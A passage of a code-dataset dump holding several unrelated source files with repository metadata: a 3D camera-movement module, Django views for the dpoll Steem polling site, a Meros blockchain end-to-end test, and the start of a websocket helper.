] | null | null | null | sl_cutscenes/camera.py | AIS-Bonn/sl-scenes | d50128b86a9c808cbe5943e737a4974f0a8d3982 | [
"MIT"
] | null | null | null | import numpy as np
import torch
from typing import List
from sl_cutscenes.constants import SCENARIO_DEFAULTS
from sl_cutscenes.utils.camera_utils import ConstFunc, LinFunc, LinFuncOnce, SinFunc, TanhFunc
camera_movement_constraints = SCENARIO_DEFAULTS["camera_movement"]
class Camera(object):
    '''
    The camera object provides a range of functionalities to better model real-world (stereo) cameras
    that might move around or behave otherwise as time passes.
    '''
    def __init__(self, name: str, cam_dt: float, elev_angle: float, ori_angle: float, distance: float,
                 lookat: torch.Tensor, stereo_pair_dist: float, stereo_positions: List[str], movement_complexity: int):
        self.name = name  # can be used e.g. to name the corresponding output directories
        self.cam_dt = cam_dt  # default time increment (seconds) used by step()
        self.movement_complexity = movement_complexity  # number of pose parameters allowed to animate (0-3)
        self.moving = self.movement_complexity > 0
        self.stereo_pair_dist = stereo_pair_dist  # baseline distance between the two stereo views
        self.stereo_positions = stereo_positions
        # Initial pose parameters, kept separate so the camera can be reset.
        self.start_elev_angle = elev_angle
        self.start_ori_angle = ori_angle
        self.start_distance = distance
        self.start_base_lookat = lookat
        self.start_up_vec = torch.tensor([0.0, 0.0, 1.0])  # TODO adjustable up vector instead of [0, 0, 1]
        self.reset_cam()
        self.setup_cam_pos_func()

    def reset_cam(self):
        """Reset the simulation clock and the look-at point to start values."""
        self.t = 0.0  # in seconds
        self.base_lookat = self.start_base_lookat

    def setup_cam_pos_func(self):
        """Randomly choose a movement function per pose parameter (elevation,
        orientation, distance), animating at most ``movement_complexity`` of them."""
        # for each attribute that can be animated, generate a probability number.
        # Keep the <self.movement_complexity> highest ones.
        if self.moving:
            probs_for_movement = np.random.uniform(size=3)
            # the following line doesn't work for N=0. Therefore, the if-statement has to be used.
            probs_for_movement[probs_for_movement.argsort()[:-1 * self.movement_complexity]] = 0
        else:
            probs_for_movement = np.zeros(shape=(3,))
        prob_elev, prob_ori, prob_dist = probs_for_movement
        # Use previously generated random numbers to decide whether a
        # Non-constant movement function will be used for that specific parameter.
        # - movement function for elevation angle attribute
        if np.random.uniform() >= prob_elev:
            self.elev_angle_func = ConstFunc(self.start_elev_angle, None, None, None)
        else:
            start_val = self.start_elev_angle
            end_val = self.cmc_random_uniform("delta_elev") + start_val
            start_t = self.cmc_random_uniform("t_start")
            end_t = self.cmc_random_uniform("t_duration") + start_t
            elev_func = np.random.choice([SinFunc, LinFuncOnce, TanhFunc])
            self.elev_angle_func = elev_func(start_val, end_val, start_t, end_t)
        # - movement function for orientation angle attribute
        if np.random.uniform() >= prob_ori:
            self.ori_angle_func = ConstFunc(self.start_ori_angle, None, None, None)
        else:
            start_val = self.start_ori_angle
            end_val = self.cmc_random_uniform("delta_ori") + start_val
            start_t = self.cmc_random_uniform("t_start")
            end_t = self.cmc_random_uniform("t_duration") + start_t
            ori_func = np.random.choice([SinFunc, LinFuncOnce, TanhFunc, LinFunc])
            self.ori_angle_func = ori_func(start_val, end_val, start_t, end_t)
        # - movement function for distance attribute
        if np.random.uniform() >= prob_dist:
            self.distance_func = ConstFunc(self.start_distance, None, None, None)
        else:
            start_val = self.start_distance
            end_val = self.cmc_random_uniform("delta_dist") + start_val
            start_t = self.cmc_random_uniform("t_start")
            end_t = self.cmc_random_uniform("t_duration") + start_t
            distance_func = np.random.choice([SinFunc, LinFuncOnce, TanhFunc])
            self.distance_func = distance_func(start_val, end_val, start_t, end_t)

    # TODO: use config
    def cmc_random_uniform(self, parameter):
        """Sample uniformly within the configured constraint range for
        *parameter* at the current movement-complexity level (1-based)."""
        assert self.movement_complexity > 0
        return np.random.uniform(
            camera_movement_constraints[parameter]["min"][self.movement_complexity - 1],
            camera_movement_constraints[parameter]["max"][self.movement_complexity - 1]
        )

    @property
    def elev_angle(self):
        # Current elevation angle in degrees, clamped to [0, 89].
        return np.clip(self.elev_angle_func.get_value(self.t), 0, 89).item()

    @property
    def ori_angle(self):
        # Current orientation angle in degrees, wrapped into [0, 360).
        return self.ori_angle_func.get_value(self.t) % 360

    @property
    def distance(self):
        # Current camera distance, clamped to [0.8, 5.0].
        return np.clip(self.distance_func.get_value(self.t), 0.8, 5.0).item()

    def stereo_deviation(self, vec, stereo_position):
        """Offset *vec* by half the stereo baseline, perpendicular to the
        viewing direction (cross product of view vector and up vector)."""
        deviation_vec = torch.cross(
            (self.base_lookat - self.base_pos).double(), self.start_up_vec.double()
        ).float()
        deviation_vec *= self.stereo_pair_dist / (2 * torch.linalg.norm(deviation_vec))
        return vec - deviation_vec if stereo_position == "left" else vec + deviation_vec

    @property
    def base_pos(self):
        """
        Calculate the camera position from given lookat position, camera distance
        and elevation/orientation angle (in degrees)
        """
        cam_x = np.cos(self.ori_angle * np.pi / 180.) * np.cos(self.elev_angle * np.pi / 180.)
        cam_y = np.sin(self.ori_angle * np.pi / 180.) * np.cos(self.elev_angle * np.pi / 180.)
        cam_z = np.sin(self.elev_angle * np.pi / 180.)
        cam_xyz = torch.tensor([cam_x, cam_y, cam_z])
        cam_pos = self.base_lookat + cam_xyz * self.distance
        return cam_pos

    def get_pos(self, stereo_position="mono"):
        """Camera position; shifted sideways for 'left'/'right' stereo views."""
        pos = self.base_pos
        return pos if stereo_position == "mono" else self.stereo_deviation(pos, stereo_position)

    def get_lookat(self, stereo_position="mono"):
        """Look-at point; shifted sideways for 'left'/'right' stereo views."""
        lookat = self.base_lookat
        return lookat if stereo_position == "mono" else self.stereo_deviation(lookat, stereo_position)

    def get_posed_name(self, stereo_position="mono"):
        """Camera name suffixed with the stereo position, e.g. 'cam_left'."""
        return f"{self.name}_{stereo_position}"

    def step(self, dt=None):
        """Advance the camera clock by *dt* seconds (default: self.cam_dt).

        NOTE(review): ``dt or self.cam_dt`` treats dt == 0 as "not given"
        and falls back to cam_dt — confirm that is intended.
        """
        dt = dt or self.cam_dt
        self.t += dt
| 45.962687 | 119 | 0.670401 | 5,884 | 0.95535 | 0 | 0 | 867 | 0.14077 | 0 | 0 | 1,156 | 0.187693 |
63785e4a628f813a35572751a22a0fef1e469f30 | 23,016 | py | Python | dpoll/polls/views.py | tymmesyde/dpoll.xyz | d3b6b204026f05b3b7a8e0baccf23dee6a41d679 | [
"MIT"
] | null | null | null | dpoll/polls/views.py | tymmesyde/dpoll.xyz | d3b6b204026f05b3b7a8e0baccf23dee6a41d679 | [
"MIT"
] | null | null | null | dpoll/polls/views.py | tymmesyde/dpoll.xyz | d3b6b204026f05b3b7a8e0baccf23dee6a41d679 | [
"MIT"
] | null | null | null | import copy
import uuid
import json
from datetime import timedelta
from dateutil.parser import parse
from django.conf import settings
from django.contrib import messages
from django.contrib.auth import authenticate, login
from django.contrib.auth.views import auth_logout
from django.core.paginator import Paginator
from django.db.models import Count
from django.http import Http404
from django.http import HttpResponse, JsonResponse
from django.shortcuts import render, redirect
from django.views.decorators.csrf import csrf_exempt
from django.utils.timezone import now
from steemconnect.client import Client
from steemconnect.operations import Comment
from base.utils import add_tz_info
from .models import Question, Choice, User, VoteAudit
from communities.models import Community
from .utils import (
get_sc_client, get_comment_options, get_top_dpollers,
get_top_voters, validate_input, add_or_get_question, add_choices,
get_comment, fetch_poll_data, sanitize_filter_value)
from lightsteem.client import Client as LightsteemClient
TEAM_MEMBERS = [
{
"username": "emrebeyler",
"title": "Developer",
},
{
"username": "isnochys",
"title": "Joker",
},
{
"username": "bluerobo",
"title": "Curator",
},
{
"username": "tolgahanuzun",
"title": "Developer",
}
]
def index(request):
    """Render the landing page: paginated active polls plus sidebar stats.

    The ``order`` query parameter selects the listing: ``trending`` orders
    by voter count, ``promoted`` restricts to promoted polls ordered by
    promotion amount, anything else lists newest first.
    """
    filters = {
        "expire_at__gt": now(),
        "is_deleted": False,
    }
    requested_order = request.GET.get("order")
    if requested_order == "trending":
        ordering = "-voter_count"
    elif requested_order == "promoted":
        ordering = "-promotion_amount"
        # The promoted listing only shows polls with a non-zero promotion.
        filters["promotion_amount__gt"] = float(0.000)
    else:
        ordering = "-id"
    active_polls = Question.objects.filter(**filters).order_by(ordering)
    paginator = Paginator(active_polls, 10)
    # The single highest-promoted active poll is featured separately
    # (None when no promoted poll exists).
    promoted_poll = Question.objects.filter(
        expire_at__gt=now(),
        promotion_amount__gt=float(0.000),
    ).order_by("-promotion_amount").first()
    polls = paginator.get_page(request.GET.get('page'))
    stats = {
        'poll_count': Question.objects.all().count(),
        'vote_count': Choice.objects.aggregate(
            total_votes=Count('voted_users'))["total_votes"],
        'user_count': User.objects.all().count(),
        'top_dpollers': get_top_dpollers(),
        'top_voters': get_top_voters(),
    }
    return render(request, "index.html", {
        "polls": polls, "stats": stats, "promoted_poll": promoted_poll})
def sc_login(request):
    """Handle SteemConnect OAuth login.

    Without an ``access_token`` query parameter, redirect the user to the
    SteemConnect authorization page; with one, authenticate, refresh the
    user's cached info, store the token in the session, and redirect back.
    """
    if 'access_token' not in request.GET:
        # First leg of the OAuth flow: send the user to SteemConnect.
        login_url = get_sc_client().get_login_url(
            redirect_uri=settings.SC_REDIRECT_URI,
            scope="login,comment,comment_options",
        )
        return redirect(login_url)
    user = authenticate(access_token=request.GET.get("access_token"))
    if user is not None:
        if user.is_active:
            login(request, user)
            try:
                # Trigger update on user info (SP, rep, etc.)
                user.update_info()
            except Exception as e:
                # Fall back to an asynchronous refresh if the sync one fails.
                user.update_info_async()
            request.session["sc_token"] = request.GET.get("access_token")
            # Return the user to where they started the login, if recorded.
            if request.session.get("initial_referer"):
                return redirect(request.session["initial_referer"])
            return redirect("/")
        else:
            return HttpResponse("Account is disabled.")
    else:
        return HttpResponse("Invalid login details.")
def sc_logout(request):
    """Log the user out of the Django session and return to the index page."""
    auth_logout(request)
    return redirect("/")
def create_poll(request):
    """Create a new poll: validate input, persist it, broadcast to Steem.

    GET renders the empty form; POST validates, saves the Question and its
    Choices, then broadcasts a comment + comment_options pair through
    SteemConnect.  On broadcast failure the saved poll is rolled back.
    """
    if not request.user.is_authenticated:
        return redirect('login')
    if request.method == 'POST':
        form_data = copy.copy(request.POST)
        if 'sc_token' not in request.session:
            # No SteemConnect token in the session: cannot broadcast.
            return redirect("/")
        error, question, choices, expire_at, permlink, days, tags, \
            allow_multiple_choices = validate_input(request)
        if error:
            # Re-render the form with the user's previous input preserved.
            form_data.update({
                "answers": request.POST.getlist("answers[]"),
                "expire_at": request.POST.get("expire-at"),
                "reward_option": request.POST.get("reward-option"),
                "allow_multiple_choices": request.POST.get(
                    "allow-multiple-choices"),
            })
            return render(request, "add.html", {"form_data": form_data})
        # Reject duplicate permlinks for the same author.
        if (Question.objects.filter(
                permlink=permlink, username=request.user)).exists():
            messages.add_message(
                request,
                messages.ERROR,
                "You have already a similar poll."
            )
            return redirect('create-poll')
        # add question
        question = add_or_get_question(
            request,
            question,
            permlink,
            days,
            allow_multiple_choices
        )
        question.save()
        # add answers attached to it
        add_choices(question, choices)
        # send it to the steem blockchain
        sc_client = Client(access_token=request.session.get("sc_token"))
        comment = get_comment(request, question, choices, permlink, tags)
        comment_options = get_comment_options(
            comment,
            reward_option=request.POST.get("reward-option")
        )
        if not settings.BROADCAST_TO_BLOCKCHAIN:
            # Broadcasting disabled (e.g. in development): pretend success.
            resp = {}
        else:
            resp = sc_client.broadcast([
                comment.to_operation_structure(),
                comment_options.to_operation_structure(),
            ])
        if 'error' in resp:
            if 'The token has invalid role' in resp.get("error_description"):
                # expired token
                auth_logout(request)
                return redirect('login')
            messages.add_message(
                request,
                messages.ERROR,
                resp.get("error_description", "error")
            )
            # Roll back the locally saved poll since the broadcast failed.
            question.delete()
            return redirect('create-poll')
        return redirect('detail', question.username, question.permlink)
    return render(request, "add.html")
# View: edit an existing poll. Only the original author may edit; the permlink
# is kept stable so the blockchain post is updated in place (single comment op,
# no comment_options on edit).
def edit_poll(request, author, permlink):
if not request.user.is_authenticated:
return redirect('login')
try:
poll = Question.objects.get(
permlink=permlink,
username=author,
)
except Question.DoesNotExist:
raise Http404
# Only the poll's author may edit it.
if author != request.user.username:
raise Http404
if request.method == "GET":
# Pre-fill the form from the chain copy plus local DB fields.
poll_data = fetch_poll_data(poll.username, poll.permlink)
tags = poll_data.get("tags", [])
# Hide the app's default tags from the editable tag list.
tags = [tag for tag in tags if tag not in settings.DEFAULT_TAGS]
form_data = {
"question": poll.text,
"description": poll.description,
"answers": [c.text for c in Choice.objects.filter(question=poll)],
"expire_at": poll.expire_at_humanized,
"tags": ",".join(tags),
"allow_multiple_choices": poll.allow_multiple_choices
}
if request.method == 'POST':
form_data = copy.copy(request.POST)
if 'sc_token' not in request.session:
return redirect("/")
error, question, choices, expire_at, _, days, tags, \
allow_multiple_choices = validate_input(request)
if tags:
tags = settings.DEFAULT_TAGS + tags
else:
tags = settings.DEFAULT_TAGS
# Keep the original permlink so the chain post is edited, not duplicated.
permlink = poll.permlink
if error:
form_data.update({
"answers": request.POST.getlist("answers[]"),
"expire_at": request.POST.get("expire-at"),
"allow_multiple_choices": request.POST.get(
"allow-multiple-choices"),
})
return render(request, "edit.html", {"form_data": form_data})
# add question
question = add_or_get_question(
request,
question,
permlink,
days,
allow_multiple_choices
)
question.save()
# add answers attached to it (flush=True replaces the old choices)
add_choices(question, choices, flush=True)
# send it to the steem blockchain
sc_client = Client(access_token=request.session.get("sc_token"))
comment = get_comment(request, question, choices, permlink, tags=tags)
if not settings.BROADCAST_TO_BLOCKCHAIN:
resp = {}
else:
resp = sc_client.broadcast([
comment.to_operation_structure(),
])
if 'error' in resp:
if 'The token has invalid role' in resp.get("error_description"):
# expired token
auth_logout(request)
return redirect('login')
messages.add_message(
request,
messages.ERROR,
resp.get("error_description", "error")
)
question.delete()
# NOTE(review): django.shortcuts.redirect has no `args` kwarg; this line
# would raise TypeError if reached — likely meant redirect('edit', author, permlink).
return redirect('edit', args=(author, permlink))
return redirect('detail', question.username, question.permlink)
return render(request, "edit.html", {
"form_data": form_data,
})
# View: poll detail page. Supports GET filters (rep/sp/age/post_count,
# stake weighting, community membership) and an "audit" mode that returns
# the raw vote audit response instead of the HTML page.
def detail(request, user, permlink):
if 'after_promotion' in request.GET:
messages.add_message(
request,
messages.SUCCESS,
"Thanks for the promotion. Transfer will be picked up by our "
"systems between 2 and 5 minutes."
)
try:
poll = Question.objects.get(
username=user, permlink=permlink, is_deleted=False)
except Question.DoesNotExist:
raise Http404
# Sanitize the numeric GET filters before handing them to votes_summary.
rep = sanitize_filter_value(request.GET.get("rep"))
sp = sanitize_filter_value(request.GET.get("sp"))
age = sanitize_filter_value(request.GET.get("age"))
post_count = sanitize_filter_value(request.GET.get("post_count"))
community = request.GET.get("community")
# Verify the community exists; otherwise ignore the filter silently.
try:
Community.objects.get(name=community)
except Community.DoesNotExist:
community = None
if community:
messages.add_message(
request,
messages.INFO,
f"Note: Only showing {community} members' choices."
)
# stake_based=1 -> STEEM-power weighting, 2 -> SA stake weighting.
choice_list, choice_list_ordered, choices_selected, filter_exists, \
all_votes = poll.votes_summary(
age=age,
rep=rep,
sp=sp,
post_count=post_count,
stake_based=request.GET.get("stake_based") == "1",
sa_stake_based=request.GET.get("stake_based") == "2",
community=community,
)
# Choice ids the current user already voted on (used to highlight them).
user_votes = Choice.objects.filter(
voted_users__username=request.user.username,
question=poll,
).values_list('id', flat=True)
if 'audit' in request.GET:
return poll.audit_response(choice_list)
return render(request, "poll_detail.html", {
"poll": poll,
"choices": choice_list,
"choices_ordered": choice_list_ordered,
"total_votes": all_votes,
"user_votes": user_votes,
"show_bars": choices_selected > 1,
"filters_applied": filter_exists,
"communities": Community.objects.all().order_by("-id"),
})
def vote(request, user, permlink):
    """Cast a vote on a poll.

    Validates the request (auth, token, choices, not-expired, not-already-voted),
    broadcasts a vote comment to the Steem blockchain through SteemConnect, and
    only then records the vote plus an audit entry in the local database.
    """
    if request.method != "POST":
        raise Http404
    # django admin users should not be able to vote.
    # BUG FIX: the original called redirect('logout') without returning it,
    # so the request fell through and the user could vote anyway.
    if not request.session.get("sc_token"):
        return redirect('logout')
    try:
        poll = Question.objects.get(username=user, permlink=permlink)
    except Question.DoesNotExist:
        raise Http404
    if not request.user.is_authenticated:
        return redirect('login')
    if poll.allow_multiple_choices:
        choice_ids = request.POST.getlist("choice-id")
    else:
        choice_ids = [request.POST.get("choice-id")]
    # remove noise (missing form fields come through as None)
    choice_ids = [x for x in choice_ids if x is not None]
    additional_thoughts = request.POST.get("vote-comment", "")
    if not choice_ids:
        messages.add_message(
            request,
            messages.ERROR,
            "You need to pick a choice to vote."
        )
        return redirect("detail", poll.username, poll.permlink)
    if Choice.objects.filter(
            voted_users__username=request.user,
            question=poll).exists():
        messages.add_message(
            request,
            messages.ERROR,
            "You have already voted for this poll!"
        )
        return redirect("detail", poll.username, poll.permlink)
    if not poll.is_votable():
        messages.add_message(
            request,
            messages.ERROR,
            "This poll is expired!"
        )
        return redirect("detail", poll.username, poll.permlink)
    # Resolve the selected choices once (the original fetched each Choice
    # twice: once to validate, once to collect).
    choice_instances = []
    for choice_id in choice_ids:
        try:
            choice_instances.append(Choice.objects.get(pk=int(choice_id)))
        except Choice.DoesNotExist:
            raise Http404
    # send it to the steem blockchain
    sc_client = Client(access_token=request.session.get("sc_token"))
    choice_text = ""
    for c in choice_instances:
        choice_text += f" - {c.text.strip()}\n"
    body = f"Voted for \n {choice_text}"
    if additional_thoughts:
        body += f"\n\n{additional_thoughts}"
    comment = Comment(
        author=request.user.username,
        permlink=str(uuid.uuid4()),
        body=body,
        parent_author=poll.username,
        parent_permlink=poll.permlink,
        json_metadata={
            "tags": settings.DEFAULT_TAGS,
            "app": f"dpoll/{settings.DPOLL_APP_VERSION}",
            "content_type": "poll_vote",
            "votes": [c.text.strip() for c in choice_instances],
        }
    )
    comment_options = get_comment_options(comment)
    if not settings.BROADCAST_TO_BLOCKCHAIN:
        resp = {}
    else:
        resp = sc_client.broadcast([
            comment.to_operation_structure(),
            comment_options.to_operation_structure(),
        ])
    # Steemconnect sometimes returns 503.
    # https://github.com/steemscript/steemconnect/issues/356
    if not isinstance(resp, dict):
        messages.add_message(
            request,
            messages.ERROR,
            "We got an unexpected error from Steemconnect. Please, try again."
        )
        return redirect("detail", poll.username, poll.permlink)
    # Expected way to receive errors on broadcasting
    if 'error' in resp:
        messages.add_message(
            request,
            messages.ERROR,
            resp.get("error_description", "error")
        )
        return redirect("detail", poll.username, poll.permlink)
    # register the vote to the database (only after a successful broadcast)
    for choice_instance in choice_instances:
        choice_instance.voted_users.add(request.user)
    block_id = resp.get("result", {}).get("block_num")
    trx_id = resp.get("result", {}).get("id")
    # add trx id and block id to the audit log
    vote_audit = VoteAudit(
        question=poll,
        voter=request.user,
        block_id=block_id,
        trx_id=trx_id
    )
    vote_audit.save()
    for choice_instance in choice_instances:
        vote_audit.choices.add(choice_instance)
    messages.add_message(
        request,
        messages.SUCCESS,
        "You have successfully voted!"
    )
    return redirect("detail", poll.username, poll.permlink)
def profile(request, user):
    """Render a user's public profile: polls created and votes cast."""
    try:
        profile_user = User.objects.get(username=user)
    except User.DoesNotExist:
        raise Http404
    polls = profile_user.polls_created
    votes = profile_user.votes_casted
    context = {
        "user": profile_user,
        "polls": polls,
        "votes": votes,
        "poll_count": len(polls),
        "vote_count": len(votes),
    }
    return render(request, "profile.html", context)
def team(request):
    """Static page listing the project's team members."""
    context = {"team_members": TEAM_MEMBERS}
    return render(request, "team.html", context)
def polls_by_vote_count(request):
    """List polls created in a date window, ordered by unique-voter count.

    GET params: start_time / end_time (parseable datetimes; default last 7
    days) and exclude_team_members (truthy to hide team-created polls).
    """
    end_time = now()
    start_time = now() - timedelta(days=7)
    if request.GET.get("start_time"):
        try:
            start_time = add_tz_info(parse(request.GET.get("start_time")))
        except Exception:
            # Unparsable input: silently keep the default window.
            pass
    if request.GET.get("end_time"):
        try:
            end_time = add_tz_info(parse(request.GET.get("end_time")))
        except Exception:
            pass
    questions = Question.objects.filter(
        created_at__gt=start_time,
        created_at__lt=end_time)
    if request.GET.get("exclude_team_members"):
        questions = questions.exclude(username__in=settings.TEAM_MEMBERS)
    polls = []
    for question in questions:
        # Count each voter once per poll, even when multiple choices were
        # selected. A set gives O(1) membership (the original used a list,
        # making this loop quadratic in voter count).
        counted_user_pks = set()
        for choice in question.choices.all():
            for voted_user in choice.voted_users.all():
                counted_user_pks.add(voted_user.pk)
        polls.append({"vote_count": len(counted_user_pks), "poll": question})
    polls = sorted(polls, key=lambda x: x["vote_count"], reverse=True)
    return render(request, "polls_by_vote.html", {
        "polls": polls, "start_time": start_time, "end_time": end_time})
# API endpoint (POST, CSRF-exempt): builds the comment payload a client needs
# to broadcast a poll vote itself, and returns it as JSON. Performs the same
# body/metadata construction as the vote() view but does not touch the DB.
@csrf_exempt
def vote_transaction_details(request):
poll_id = request.POST.get("poll_id")
choices = request.POST.getlist("choices[]")
additional_thoughts = request.POST.get("additional_thoughts")
username = request.POST.get("username")
try:
poll = Question.objects.get(pk=int(poll_id))
except Question.DoesNotExist:
raise Http404
# Resolve every submitted choice id; any unknown id 404s the request.
choice_instances = []
for choice_id in choices:
try:
choice = Choice.objects.get(pk=int(choice_id))
except Choice.DoesNotExist:
raise Http404
choice_instances.append(choice)
# Human-readable body listing the selected choices.
choice_text = ""
for c in choice_instances:
choice_text += f" - {c.text.strip()}\n"
body = f"Voted for \n {choice_text}"
if additional_thoughts:
body += f"\n\n{additional_thoughts}"
permlink = str(uuid.uuid4())
parent_author = poll.username
parent_permlink = poll.permlink
# Machine-readable metadata mirroring what vote() broadcasts.
json_metadata = {
"tags": settings.DEFAULT_TAGS,
"app": f"dpoll/{settings.DPOLL_APP_VERSION}",
"content_type": "poll_vote",
"votes": [c.text.strip() for c in choice_instances],
}
return JsonResponse({
"username": username,
"permlink": permlink,
"title": "",
"body": body,
"json_metadata": json_metadata,
"parent_username": parent_author,
"parent_permlink": parent_permlink,
"comment_options": "",
})
# Endpoint: registers a vote that was broadcast to the chain outside this app.
# Given trx_id and block_num (GET params), it fetches the block, locates the
# comment operation, validates its poll_vote metadata against the local DB,
# and records the vote plus an audit entry.
def sync_vote(request):
trx_id = request.GET.get("trx_id")
try:
# block numbers must be integer
block_num = int(request.GET.get("block_num"))
except (TypeError, ValueError):
return HttpResponse('Invalid block ID', status=400)
c = LightsteemClient()
block_data = c.get_block(block_num)
if not block_data:
# block data may return null if it's invalid
return HttpResponse('Invalid block ID', status=400)
# Find the transaction with the requested id inside the block.
vote_tx = None
for transaction in block_data.get("transactions", []):
if transaction.get("transaction_id") == trx_id:
vote_tx = transaction
break
if not vote_tx:
return HttpResponse('Invalid transaction ID', status=400)
# Pick the comment operation out of the transaction.
# NOTE(review): this loop iterates `transaction` (== vote_tx after the break
# above) and keeps the LAST comment op if there are several — confirm intended.
vote_op = None
for op_type, op_value in transaction.get("operations", []):
if op_type != "comment":
continue
vote_op = op_value
if not vote_op:
return HttpResponse("Couldn't find valid vote operation.", status=400)
# validate json metadata
if not vote_op.get("json_metadata"):
return HttpResponse("json_metadata is missing.", status=400)
json_metadata = json.loads(vote_op.get("json_metadata", ""))
# json_metadata should indicate content type
if json_metadata.get("content_type") != "poll_vote":
return HttpResponse("content_type field is missing.", status=400)
# check votes
votes = json_metadata.get("votes", [])
if not len(votes):
return HttpResponse("votes field is missing.", status=400)
# check the poll exists (the comment must reply to a poll post)
try:
question = Question.objects.get(
username=vote_op.get("parent_author"),
permlink=vote_op.get("parent_permlink"),
)
except Question.DoesNotExist:
return HttpResponse("parent_author/parent_permlink is not a poll.", status=400)
# Validate the choice: match metadata vote texts against the poll's choices.
choices = Choice.objects.filter(
question=question,
)
selected_choices = []
for choice in choices:
for user_vote in votes:
if choice.text == user_vote:
selected_choices.append(choice)
if not selected_choices:
return HttpResponse("Invalid choices in votes field.", status=400)
# check if the user exists in our database
# if it doesn't, create it.
try:
user = User.objects.get(username=vote_op.get("author"))
except User.DoesNotExist:
user = User.objects.create_user(
username=vote_op.get("author"))
user.save()
# check if we already registered a vote from that user
if Choice.objects.filter(
voted_users__username=vote_op.get("author"),
question=question).count() != 0:
return HttpResponse("You have already voted on that poll.", status=400)
# register the vote
for selected_choice in selected_choices:
selected_choice.voted_users.add(user)
# add vote audit entry
vote_audit = VoteAudit(
question=question,
voter=user,
block_id=block_num,
trx_id=trx_id
)
vote_audit.save()
return HttpResponse("Vote is registered to the database.", status=200)
def vote_check(request):
    """JSON endpoint: did voter_username already vote on question_id?"""
    try:
        question = Question.objects.get(pk=request.GET.get("question_id"))
    except Question.DoesNotExist:
        raise Http404
    voter = request.GET.get("voter_username")
    if not voter:
        raise Http404
    # Collect every username that voted on any choice of this poll.
    voters = set()
    for choice in Choice.objects.filter(question=question):
        for voted_user in choice.voted_users.all():
            voters.add(voted_user.username)
    return JsonResponse({"voted": voter in voters})
| 30.728972 | 87 | 0.60849 | 0 | 0 | 0 | 0 | 1,433 | 0.062261 | 0 | 0 | 4,437 | 0.192779 |
637b49097674b4c3f8587181a185a473471f7b03 | 2,251 | py | Python | e2e/Tests/Merit/MultiplePacketsTest.py | kayabaNerve/Currency | 260ebc20f1704f42ad6183fee39ad58ec6d07961 | [
"CC0-1.0"
] | 66 | 2019-01-14T08:39:52.000Z | 2022-01-06T11:39:15.000Z | e2e/Tests/Merit/MultiplePacketsTest.py | kayabaNerve/Currency | 260ebc20f1704f42ad6183fee39ad58ec6d07961 | [
"CC0-1.0"
] | 228 | 2019-01-16T15:42:44.000Z | 2022-02-05T07:48:07.000Z | e2e/Tests/Merit/MultiplePacketsTest.py | kayabaNerve/Currency | 260ebc20f1704f42ad6183fee39ad58ec6d07961 | [
"CC0-1.0"
] | 19 | 2019-01-14T08:53:04.000Z | 2021-11-03T20:19:28.000Z | #Tests that blocks can't have multiple verification packets for the same transaction.
from typing import Dict, Any
import json
from pytest import raises
from e2e.Libs.Minisketch import Sketch
from e2e.Classes.Transactions.Data import Data
from e2e.Classes.Consensus.VerificationPacket import VerificationPacket
from e2e.Classes.Merit.Blockchain import Block, Blockchain
from e2e.Meros.Meros import MessageType
from e2e.Meros.RPC import RPC
from e2e.Meros.Liver import Liver
from e2e.Tests.Errors import TestError, SuccessError
# e2e test: a Block containing multiple VerificationPackets for the same
# transaction must be rejected. Feeds Meros the Data tx and the bad Block,
# answers its sketch-hash requests, then asserts the Block is NOT added.
def MultiplePacketsTest(
rpc: RPC
) -> None:
#Spawn a Blockchain just to set the RandomX key.
_: Blockchain = Blockchain()
vectors: Dict[str, Any]
with open("e2e/Vectors/Merit/MultiplePackets.json", "r") as file:
vectors = json.loads(file.read())
data: Data = Data.fromJSON(vectors["data"])
block: Block = Block.fromJSON(vectors["blockchain"][-1])
# Callback invoked by Liver at height 2: push the Data and the invalid Block.
def sendDataAndBlock() -> None:
#Send the Data.
if rpc.meros.liveTransaction(data) != rpc.meros.live.recv():
raise TestError("Meros didn't send back the Data.")
rpc.meros.liveBlockHeader(block.header)
rpc.meros.handleBlockBody(block)
msg: bytes = rpc.meros.sync.recv()
if MessageType(msg[0]) != MessageType.SketchHashRequests:
raise TestError("Meros didn't request the packets for this Block.")
# Index this Block's packets by their sketch hash for quick lookup.
packets: Dict[int, VerificationPacket] = {}
for packet in block.body.packets:
packets[Sketch.hash(block.header.sketchSalt, packet)] = packet
#Look up each requested packet and respond accordingly.
# msg[33:37] is the little-endian count of requested hashes; each hash is
# 8 bytes starting at offset 37.
for h in range(int.from_bytes(msg[33 : 37], byteorder="little")):
sketchHash: int = int.from_bytes(msg[37 + (h * 8) : 45 + (h * 8)], byteorder="little")
if sketchHash not in packets:
raise TestError("Meros asked for a non-existent Sketch Hash.")
rpc.meros.packet(packets[sketchHash])
# Success here means Meros did NOT accept the Block (recv fails/times out).
try:
if MessageType(rpc.meros.live.recv()[0]) == MessageType.BlockHeader:
raise TestError("Meros added the Block.")
except Exception as e:
if str(e) != "Meros added the Block.":
raise SuccessError()
# The test passes only via SuccessError raised from the callback.
with raises(SuccessError):
Liver(
rpc,
vectors["blockchain"],
callbacks={
2: sendDataAndBlock
}
).live()
| 32.623188 | 92 | 0.702355 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 469 | 0.208352 |
637c926e9fd9828afed3a289b40e1b60ecb64afd | 2,891 | py | Python | skworkorders/test_websocket.py | ZhaoUncle/skstack | 9e00305f50fdd60125ec37884247b94b70a9020c | [
"Apache-2.0"
] | null | null | null | skworkorders/test_websocket.py | ZhaoUncle/skstack | 9e00305f50fdd60125ec37884247b94b70a9020c | [
"Apache-2.0"
] | null | null | null | skworkorders/test_websocket.py | ZhaoUncle/skstack | 9e00305f50fdd60125ec37884247b94b70a9020c | [
"Apache-2.0"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on 2018年4月17日 @author: encodingl
'''
from django.shortcuts import render
#from dwebsocket.decorators import accept_websocket, require_websocket
from django.http import HttpResponse
import paramiko
from django.contrib.auth.decorators import login_required
from skaccounts.permission import permission_verify
import subprocess
from django.shortcuts import render
from django.template import RequestContext
from channels.layers import get_channel_layer
from asgiref.sync import async_to_sync
# Push `msg` to every consumer in channel-layer group `group_name` as a
# 'show_in_windows' event (django-channels). The bare print() calls are
# leftover debug traces.
def web_send(group_name,msg):
print("4")
channel_layer = get_channel_layer()
print("5")
print(group_name)
# group_send is async; async_to_sync lets us call it from sync view code.
async_to_sync(channel_layer.group_send)(group_name,
{
'type': 'show_in_windows',
'message': msg
}
)
print("6")
class TestWebSend():
    """Small helper that forwards a message to a channel-layer group."""

    def __init__(self, group_name, msg):
        # The print() calls reproduce the original debug traces.
        self.msg = msg
        print(self.msg)
        self.group_name = group_name
        print(self.group_name)

    def sendmsg(self):
